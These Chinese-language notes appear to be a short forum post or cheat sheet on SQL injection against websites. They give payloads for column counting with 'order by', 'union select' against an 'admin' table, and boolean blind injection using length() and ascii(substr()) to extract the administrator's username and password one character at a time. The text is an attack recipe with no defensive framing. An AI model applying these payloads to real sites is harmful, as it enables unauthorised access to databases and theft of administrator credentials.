先判断好注入点后

order by 长度

union select 'null',null,null ... from admin 如果在某个地方返回正确了,那么就能在这个注入点注入

推荐看一本书《藏锋者》

字段长度太短的话使用另一种注入方式来注入 在网站后方加入 and (select count(*) from admin)<>0返回正确说明存在该表

判断完成后,再将*换成表名去猜测列名  可以猜测user password等常用列名

and (select count(*) from admin where length(name)>=5)=1  该句用来猜测管理员用户名长度

and (select count(*) from admin where ascii(substr(name,1,1))>=97)=1   ascii用来获取ASCII码值,去判断 97为a

第二个的话改这个数(name,2,1)

判断密码一样是通过把name改成pwd方法一样